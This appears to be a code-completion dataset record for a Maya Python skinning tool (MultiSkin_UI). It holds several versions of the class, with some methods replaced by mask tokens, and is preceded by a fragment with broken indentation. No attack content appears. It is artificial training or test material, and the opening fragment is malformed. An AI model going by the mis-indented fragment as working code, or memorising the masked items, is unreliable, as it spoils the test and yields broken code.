shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
            shapes_dic.update({str(transform): all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
        cluster_dic = {}
        for shape in shapes:
            try:
                incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
                if pm.objectType(incoming) == 'skinCluster':
                    cluster_dic.update({str(shape): incoming})
                else:
                    skinCluster = self.getSkinCluster(shape)
                    if skinCluster:
                        if len(skinCluster) > 1:
                            cluster_dic.update({str(shape): 'None'})
                        else:
                            cluster_dic.update({str(shape): skinCluster})
                    else:
                        cluster_dic.update({str(shape): 'None'})
            except TypeError:
                cluster_dic.update({str(shape): 'None'})
        return cluster_dic
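    # Expected mapping (hypothetical names): {'pCubeShape1': 'skinCluster1',
    # 'pSphereShape1': 'None'} -- shapes without a single skinCluster map to
    # the string 'None', which populateQTree() checks for explicitly.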
# ===============================
# BUILD WINDOW
# ===============================
def showUI(dialog=False):
if dialog:
MultiSkin_UI.show_dialog()
else:
# Make sure the UI is deleted before recreating
global tools_cw_ui
        try:
            tools_cw_ui.deleteLater()
        except Exception:
            pass
tools_cw_ui = MultiSkin_UI()
tools_cw_ui.show()
# showUI()
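# showUI(dialog=True)  # reuses a single dialog instance via MultiSkin_UI.show_dialog()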
|
flexible
|
{
"blob_id": "819607d89035413fc2800e9f16222619a74a5d64",
"index": 6429,
"step-1": "<mask token>\n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n <mask token>\n <mask token>\n <mask token>\n\n def widgetsAndLayouts(self):\n\n def addLine():\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,\n bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text\n self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]\n self.vlayout = {}\n for layoutName, margins in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [\n 'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]\n self.hlayout = {}\n for layoutName, margins in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar)\n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.\n ExtendedSelection)\n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = QtWidgets.QTreeWidgetItem(['Geometries'])\n self.meshTreeWidget.setHeaderItem(header)\n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged.connect(self.\n singleClickedAction)\n self.refreshQtree()\n\n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,\n pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],\n '', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],\n '', self.hlayout['buttonsOptions'], '', 30], ['Close All', self\n .closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[\n 'buttonsOptions'], '', 30]]\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:\n self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction)\n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord\n .split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n _optionsExpandAll = self.buttons['Expand 
All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda : self.\n expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.\n expandTree('skin cluster'))\n _optionsCloseAll = self.buttons['Close All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda : self.\n closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.\n closeTree('skin cluster'))\n\n def buildMainLayout(self):\n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n\n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n\n def searchBarEdited(self):\n matchCase = bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(' ')\n else:\n query_words = str(query).lower().split(' ')\n query_words = filter(None, query_words)\n scoreList = {}\n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n score += 1\n elif query_word in item.lower():\n score += 1\n scoreList[item] = score\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(\n query_words)]\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n self.meshTreeWidget.clear()\n self.populateQTree(sorted_matches_string)\n <mask token>\n <mask token>\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n\n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n\n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n\n def filterMeshes(self, filter='all'):\n \"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter == 'all':\n return self.getAllMeshes()\n elif filter == 'skinClusters':\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for\n c in clusters], []))\n meshes = set([x.getParent() for x in meshesShapes if pm.\n objectType(x) == 'mesh'])\n return meshes\n elif filter == 'None':\n return None\n\n @staticmethod\n def test():\n print('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n \"\"\"\n result = []\n if not pm.objExists(_transform):\n return result\n validList = 
mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) +\n '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster): all_binds_jnts})\n return bindJoints_dic\n\n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type='mesh', ni=1)\n transformList = list(set(pm.listRelatives(shapesList, parent=True)))\n transformList.sort()\n return transformList\n\n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform): all_shapes})\n return shapes_dic\n\n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes:\n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape): incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape): 'None'})\n else:\n cluster_dic.update({str(shape): skinCluster})\n else:\n cluster_dic.update({str(shape): 'None'})\n except TypeError:\n cluster_dic.update({str(shape): 'None'})\n return cluster_dic\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n <mask token>\n <mask token>\n <mask token>\n\n def widgetsAndLayouts(self):\n\n def addLine():\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,\n bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text\n self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]\n self.vlayout = {}\n for layoutName, margins in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [\n 'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]\n self.hlayout = {}\n for layoutName, margins in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar)\n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.\n ExtendedSelection)\n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = QtWidgets.QTreeWidgetItem(['Geometries'])\n self.meshTreeWidget.setHeaderItem(header)\n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged.connect(self.\n singleClickedAction)\n self.refreshQtree()\n\n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,\n pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],\n '', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],\n '', self.hlayout['buttonsOptions'], '', 30], ['Close All', self\n .closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[\n 'buttonsOptions'], '', 30]]\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:\n self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction)\n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord\n .split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n _optionsExpandAll = self.buttons['Expand 
All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda : self.\n expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.\n expandTree('skin cluster'))\n _optionsCloseAll = self.buttons['Close All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda : self.\n closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.\n closeTree('skin cluster'))\n\n def buildMainLayout(self):\n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n\n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n\n def searchBarEdited(self):\n matchCase = bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(' ')\n else:\n query_words = str(query).lower().split(' ')\n query_words = filter(None, query_words)\n scoreList = {}\n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n score += 1\n elif query_word in item.lower():\n score += 1\n scoreList[item] = score\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(\n query_words)]\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n self.meshTreeWidget.clear()\n self.populateQTree(sorted_matches_string)\n <mask token>\n\n def closeTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(False) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(False) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(False) for sclus in self.QTClusters]\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n\n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n\n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n\n def filterMeshes(self, filter='all'):\n \"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter == 'all':\n return self.getAllMeshes()\n elif filter == 'skinClusters':\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for\n c in clusters], []))\n meshes = set([x.getParent() for x in meshesShapes if pm.\n objectType(x) == 'mesh'])\n return meshes\n elif filter == 'None':\n return None\n\n 
@staticmethod\n def test():\n print('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n \"\"\"\n result = []\n if not pm.objExists(_transform):\n return result\n validList = mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) +\n '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster): all_binds_jnts})\n return bindJoints_dic\n\n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type='mesh', ni=1)\n transformList = list(set(pm.listRelatives(shapesList, parent=True)))\n transformList.sort()\n return transformList\n\n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform): all_shapes})\n return shapes_dic\n\n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes:\n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape): incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape): 'None'})\n else:\n cluster_dic.update({str(shape): skinCluster})\n else:\n cluster_dic.update({str(shape): 'None'})\n except TypeError:\n cluster_dic.update({str(shape): 'None'})\n return cluster_dic\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n __dialog = None\n\n @classmethod\n def show_dialog(cls):\n if cls.__dialog is None:\n cls.__dialog = cls()\n else:\n cls.__dialog.raise_()\n cls.__dialog.show()\n\n def __init__(self, parent=None):\n super(MultiSkin_UI, self).__init__(parent=parent)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.setObjectName('multi skin ui')\n self.starting_height = 500\n self.starting_width = 390\n self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))\n self.setWindowFlags(QtCore.Qt.Tool)\n self.setMinimumWidth(self.starting_width)\n self.resize(self.starting_width, self.starting_height)\n self.mainBox = QtWidgets.QVBoxLayout()\n self.mainBox.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout = QtWidgets.QScrollArea()\n self.mainBox.addWidget(self.scroll_layout)\n self.setLayout(self.mainBox)\n self.scroll_layout.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout.setWidgetResizable(True)\n self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)\n self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)\n self.scroll_widget = QtWidgets.QWidget()\n self.scroll_layout.setWidget(self.scroll_widget)\n self.main_layout = QtWidgets.QVBoxLayout()\n self.main_layout.setContentsMargins(*([5] * 4))\n self.main_layout.setSpacing(2)\n self.setLayout(self.main_layout)\n self.scroll_widget.setLayout(self.main_layout)\n self.widgetsAndLayouts()\n self.create_Button()\n self.buildMainLayout()\n\n def widgetsAndLayouts(self):\n\n def addLine():\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,\n bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text\n self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]\n self.vlayout = {}\n for layoutName, margins in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [\n 'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]\n self.hlayout = {}\n for layoutName, margins in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar)\n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.\n ExtendedSelection)\n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = 
QtWidgets.QTreeWidgetItem(['Geometries'])\n self.meshTreeWidget.setHeaderItem(header)\n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged.connect(self.\n singleClickedAction)\n self.refreshQtree()\n\n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,\n pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],\n '', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],\n '', self.hlayout['buttonsOptions'], '', 30], ['Close All', self\n .closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[\n 'buttonsOptions'], '', 30]]\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:\n self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction)\n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord\n .split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n _optionsExpandAll = self.buttons['Expand All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda : self.\n expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.\n expandTree('skin cluster'))\n _optionsCloseAll = self.buttons['Close All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda : self.\n closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.\n closeTree('skin cluster'))\n\n def buildMainLayout(self):\n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n\n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n\n def searchBarEdited(self):\n matchCase = bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(' ')\n else:\n query_words = str(query).lower().split(' ')\n query_words = filter(None, query_words)\n scoreList = {}\n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n score += 1\n elif query_word in item.lower():\n score += 1\n scoreList[item] = score\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(\n query_words)]\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n self.meshTreeWidget.clear()\n 
self.populateQTree(sorted_matches_string)\n\n def populateQTree(self, filterList):\n self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(\n item)]) for item in filterList]\n [root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]\n [root.setExpanded(True) for root in self.roots]\n self.QtShapes = []\n shape_dic = self.getAllShapes(self.getAllMeshes())\n QTroots_dic = {}\n for root in self.roots:\n try:\n QTroots_dic.update({root: shape_dic[root.text(0)]})\n except KeyError:\n pass\n for QTroot, shapesList in QTroots_dic.items():\n [QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in\n shapesList]\n child_count = QTroot.childCount()\n children = [QTroot.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in\n children]\n [child.setExpanded(True) for child in children]\n [self.QtShapes.append(child) for child in children]\n self.QTClusters = []\n cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))\n QTshape_dic = {}\n for shape in self.QtShapes:\n QTshape_dic.update({shape: cluster_dic[shape.text(0)]})\n for QTshape, clusterList in QTshape_dic.items():\n if clusterList == 'None':\n pass\n else:\n QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])\n child_count = QTshape.childCount()\n children = [QTshape.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in\n children]\n [self.QTClusters.append(child) for child in children]\n bindJoints_dic = self.getBindJointsFromCluster([x for x in\n cluster_dic.values() if x != 'None'])\n QTcluster_dic = {}\n for cluster in self.QTClusters:\n QTcluster_dic.update({cluster: bindJoints_dic[cluster.text(0)]})\n for QTCluster, jointList in QTcluster_dic.items():\n [QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in\n jointList]\n child_count = QTCluster.childCount()\n children = [QTCluster.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in\n children]\n\n def closeTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(False) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(False) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(False) for sclus in self.QTClusters]\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n\n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n\n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n\n def filterMeshes(self, filter='all'):\n \"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter == 'all':\n return self.getAllMeshes()\n elif filter == 'skinClusters':\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for\n c in clusters], 